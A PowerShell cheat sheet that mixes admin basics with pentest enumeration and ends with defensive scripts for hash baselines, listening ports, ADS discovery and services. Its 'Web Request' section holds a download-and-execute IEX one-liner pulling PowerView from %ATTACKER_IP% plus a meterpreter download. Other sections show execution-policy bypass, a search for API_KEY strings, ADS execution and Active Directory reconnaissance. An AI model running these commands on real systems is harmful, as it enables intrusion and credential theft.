# Powershell Usage

## Get-Help

```
Get-Help Command-Name
```

* Show examples

```
Get-Help Command-Name -Examples
```

* Get-Command lists all the cmdlets installed on the current computer.

```
Get-Command
```

```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```

## Passing Output via Pipe

* A pipe passes objects, including their methods and properties.

```
Verb-Noun | Get-Member
```

```
Get-Command | Get-Member -MemberType Method
```

## Creating Objects from Previous Cmdlets

```
Get-ChildItem | Select-Object -Property Mode, Name
```

Useful Select-Object parameters:

* -First: gets the first x objects
* -Last: gets the last x objects
* -Unique: shows only the unique objects
* -Skip: skips x objects

## Filtering Objects

```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```

The second form uses the `$_` automatic variable, which holds the current object while Where-Object iterates through every object passed to it.

* -operator is one of the following:
  * -Match: matches the exact value of the property
  * -Contains: if any item in the property value is an exact match for the specified value
  * -EQ: if the property value is the same as the specified value
  * -GT: if the property value is greater than the specified value

### Out-Gridview

Pipe the output to a graphical window and filter it through the GUI.
```
whatever | Out-GridView
```

## Sort Object

```
Verb-Noun | Sort-Object
```

```
Get-ChildItem | Sort-Object
```

## Finding a File

```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```

```sh
Get-HotFix | Format-list | findstr
```

```sh
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
```

* Find backup files

```sh
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErrorAction SilentlyContinue
```

* Find file contents

```sh
Get-ChildItem -Path C:\* -Recurse | Select-String -Pattern API_KEY
```

## Showing File Content

```
Get-Content 'C:\Program Files\interesting-file.txt'
```

* Indexing lines

```sh
(Get-Content -Path file.txt)[index]
```

* Search

```sh
Select-String -Pattern
```

## Copy File Content

```sh
Copy-Item
```

## Count Lines of Output

As an example, count all cmdlets on the system:

```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```

## Count Words

```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
```

## Checksum of File

```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```

## Current Working Directory

```
Get-Location
```

## File Metadata

```sh
ls | Format-List *
```

## Web Request

```sh
Invoke-Webrequest -Uri 'http:// -OutFile
```

```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```

* Web request and execute in one go

```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```

## Base64 Decode File

```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```

## **Circumvent Execution-Policy**

```sh
powershell -ExecutionPolicy Bypass -File .\
```

```sh
Set-ExecutionPolicy Bypass -Scope Process
```

## Enumeration

### Users

```
Get-LocalUser
```

* Users with no password required
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```

* SID of users

```
Get-WmiObject win32_useraccount | Select name, sid
```

### Network intel

* Connections

```sh
netstat -ano
```

* IP address

```
Get-NetIPAddress
```

* Listening TCP ports

```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```

* TCP port by number

```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```

### Patch level and updates

```
Get-Hotfix
```

* Find patch by HotFixID

```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```

```sh
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

### Drivers

```sh
driverquery
```

### Processes

* Start processes

```sh
Start-Process
```

* Running processes

```sh
Get-Process
```

### Scheduled tasks

```sh
schtasks /query /fo LIST /v
```

```sh
Get-ScheduledTaskInfo
```

* Scheduled tasks, by TaskName

```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```

or

```
Get-ScheduledTask -TaskName taskname
```

### Alternate Data Stream (ADS)

* Show ADS

```sh
Get-Item -Path file.exe -Stream *
```

* Open ADS

```sh
wmic process call create $(Resolve-Path file.exe:streamname)
```

### Export Output

* Export as CSV

```sh
Get-Process | Export-Csv
```

### ACL

* Owner of files

```
Get-ACL C:\
```

### Port Scanner

```
# Valid TCP ports are 1-65535; 65536 is rejected by Test-NetConnection
for($i=1; $i -le 65535; $i++) { Test-NetConnection localhost -Port $i }
```

### Ping Hosts

```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2.$_ | Select-String ttl}
```

### Antivirus

```sh
# In PowerShell, sc is an alias for Set-Content, so call the executable explicitly
sc.exe query windefend
```

* Service name unknown

```sh
# sc.exe requires the space after "type="
sc.exe queryex type= service
```

### Using Powerview

```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```

* Enumerate Group Policy

```sh
Get-NetGPO
```

* Trust relationships to other domains

```sh
Get-NetDomainTrust
```

* User enumeration

```sh
Find-LocalAdminAccess
```

```sh
whoami /priv
```

```
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership
```

### Services

List automatic-start services that are currently running, or currently stopped (these start again after a reboot), in the following way. Note that the service objects from Get-Service expose the state as `Status`, not `State`.

```sh
Get-Service | Where-Object {$_.Status -eq "Running" -and $_.StartType -eq "Automatic"}
Get-Service | Where-Object {$_.Status -eq "Stopped" -and $_.StartType -eq "Automatic"}
```
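As an added example for the Checksum of File and Export Output sections above (it is not part of the original cheat sheet), the following builds a SHA-256 baseline of a directory tree into a CSV file and later diffs the live tree against it, reporting added, modified and removed files. The function names, the directory and the CSV path are assumptions for this example; SHA256 is used rather than MD5 because MD5 collisions are cheap to produce.

```powershell
# Added example (not from the original page). Builds a file-hash baseline of a
# directory tree and later reports files that were added, modified or removed.
# Function names, $Path and $BaselineCsv are assumptions for this example.

function New-HashBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$BaselineCsv
    )
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue |
        Select-Object -Property Path, Hash |
        Export-Csv -Path $BaselineCsv -NoTypeInformation
}

function Compare-HashBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$BaselineCsv
    )
    # Load the stored baseline into a hashtable keyed by full path.
    $known = @{}
    Import-Csv -Path $BaselineCsv | ForEach-Object { $known[$_.Path] = $_.Hash }

    # Hash the live tree and classify every file against the baseline.
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue |
        ForEach-Object {
            if (-not $known.ContainsKey($_.Path)) {
                [PSCustomObject]@{ Change = 'Added';    Path = $_.Path }
            } elseif ($known[$_.Path] -ne $_.Hash) {
                [PSCustomObject]@{ Change = 'Modified'; Path = $_.Path }
            }
            $known.Remove($_.Path)
        }

    # Whatever is left in the baseline no longer exists on disk.
    foreach ($missing in $known.Keys) {
        [PSCustomObject]@{ Change = 'Removed'; Path = $missing }
    }
}

# Usage (paths are placeholders):
# New-HashBaseline -Path 'C:\Program Files\SomeApp' -BaselineCsv 'C:\baseline.csv'
# ... later ...
# Compare-HashBaseline -Path 'C:\Program Files\SomeApp' -BaselineCsv 'C:\baseline.csv' | Format-Table -AutoSize
```

Files that cannot be read (locked or access denied) are skipped silently by the `-ErrorAction SilentlyContinue` on Get-FileHash, so a baseline taken while such a file is locked will report it as Added on the next comparison; drop that switch if you prefer to see the errors.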
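As an added example for the Network intel section above (not part of the original cheat sheet), this function maps every listening TCP port to the owning process, its image path and any Windows service hosted in that process, which is the view a defender wants when deciding whether a listener is expected. The function name is an assumption; Get-NetTCPConnection and Get-CimInstance are the standard cmdlets.

```powershell
# Added example (not from the original page). For every listening TCP port, show
# the owning process, its image path and any Windows service hosted in that process.
# Requires the NetTCPIP module (Windows 8 / Server 2012 and later). Function name assumed.

function Get-ListeningPortOwner {
    # Index service names by process id once, so the per-port lookup is cheap.
    # Keys are cast to [int] because UInt32 and Int32 are different hashtable keys.
    $servicesByPid = @{}
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if ($_.ProcessId -gt 0) {
            $key = [int]$_.ProcessId
            if (-not $servicesByPid.ContainsKey($key)) { $servicesByPid[$key] = @() }
            $servicesByPid[$key] += $_.Name
        }
    }

    Get-NetTCPConnection -State Listen |
        Sort-Object -Property LocalPort, LocalAddress -Unique |
        ForEach-Object {
            $conn     = $_
            $ownerPid = [int]$conn.OwningProcess          # $pid is reserved, hence ownerPid
            $proc     = Get-Process -Id $ownerPid -ErrorAction SilentlyContinue
            $name     = if ($proc) { $proc.ProcessName } else { '<exited>' }
            $path     = if ($proc) { $proc.Path } else { $null }  # Path may be null without access
            [PSCustomObject]@{
                LocalAddress = $conn.LocalAddress
                LocalPort    = $conn.LocalPort
                OwningPid    = $ownerPid
                Process      = $name
                Path         = $path
                Services     = ($servicesByPid[$ownerPid] -join ', ')
            }
        }
}

# Usage: full table, then only listeners that are not hosted by a registered service.
Get-ListeningPortOwner | Format-Table -AutoSize
Get-ListeningPortOwner | Where-Object { -not $_.Services } | Format-Table -AutoSize
```

Run it elevated if you need the image path of system processes; without that, `Path` is empty for them and only the process name is reported.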
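As an added example for the Alternate Data Stream (ADS) section above (not part of the original cheat sheet), this function walks a directory tree with the same `Get-Item -Stream *` call and reports every file that carries a named stream other than the default `:$DATA` stream, so hidden data in ADS can be found without opening it. The function name and the default path are assumptions.

```powershell
# Added example (not from the original page). Walks a directory tree and reports every
# file that carries a named alternate data stream besides the default :$DATA stream.
# Function name and the default $Path are assumptions.

function Find-AlternateDataStream {
    param(
        [string]$Path = $env:USERPROFILE,
        # Zone.Identifier is the Mark-of-the-Web stream that browsers add to downloads;
        # it is noise for this purpose, so it is skipped unless explicitly requested.
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -LiteralPath avoids wildcard interpretation of odd file names.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
        Select-Object -Property FileName, Stream, Length
}

# Usage: list unexpected streams under a directory (path is a placeholder).
Find-AlternateDataStream -Path 'C:\Users\Public' | Format-Table -AutoSize

# Inspect a stream's content as text without executing anything (placeholders):
# Get-Content -LiteralPath 'C:\Users\Public\example.txt' -Stream 'streamname' -Raw
```

Reading a stream with `Get-Content -Stream` is the safe way to look at what was stored; the `wmic process call create` form in the section above executes the stream, which is what you are trying to detect, not what you want to do during triage.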
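As an added example for the Services section above (not part of the original cheat sheet), this joins the Get-Service view (Status and StartType, PowerShell 5.1 and later) with the Win32_Service CIM class, which additionally exposes the binary path and the run-as account, so stopped auto-start services and their executables can be reviewed together. The function name is an assumption.

```powershell
# Added example (not from the original page). Joins Get-Service (Status/StartType) with
# Win32_Service (binary path and run-as account) for every automatic-start service.
# Function name is an assumption.

function Get-AutoStartServiceReport {
    # Index the CIM view by service name for a cheap join.
    # @{} hashtables are case-insensitive, matching how service names behave.
    $cimByName = @{}
    Get-CimInstance -ClassName Win32_Service | ForEach-Object { $cimByName[$_.Name] = $_ }

    Get-Service | Where-Object { $_.StartType -eq 'Automatic' } | ForEach-Object {
        $info = $cimByName[$_.Name]
        [PSCustomObject]@{
            Name       = $_.Name
            Status     = $_.Status
            StartType  = $_.StartType
            Account    = $info.StartName
            BinaryPath = $info.PathName
        }
    }
}

# Usage: automatic services that are not running right now (would start after reboot).
Get-AutoStartServiceReport | Where-Object { $_.Status -ne 'Running' } | Format-Table -AutoSize

# Usage: automatic services whose binary lives outside the Windows directory,
# a short list that is worth reviewing by hand on an unfamiliar host.
Get-AutoStartServiceReport |
    Where-Object { $_.BinaryPath -and $_.BinaryPath -notmatch [regex]::Escape($env:SystemRoot) } |
    Format-Table -AutoSize
```

Get-Service and Win32_Service are two views of the same service control manager database, so the join by name is exact; services the current user cannot query simply have an empty `Account` and `BinaryPath` in the report.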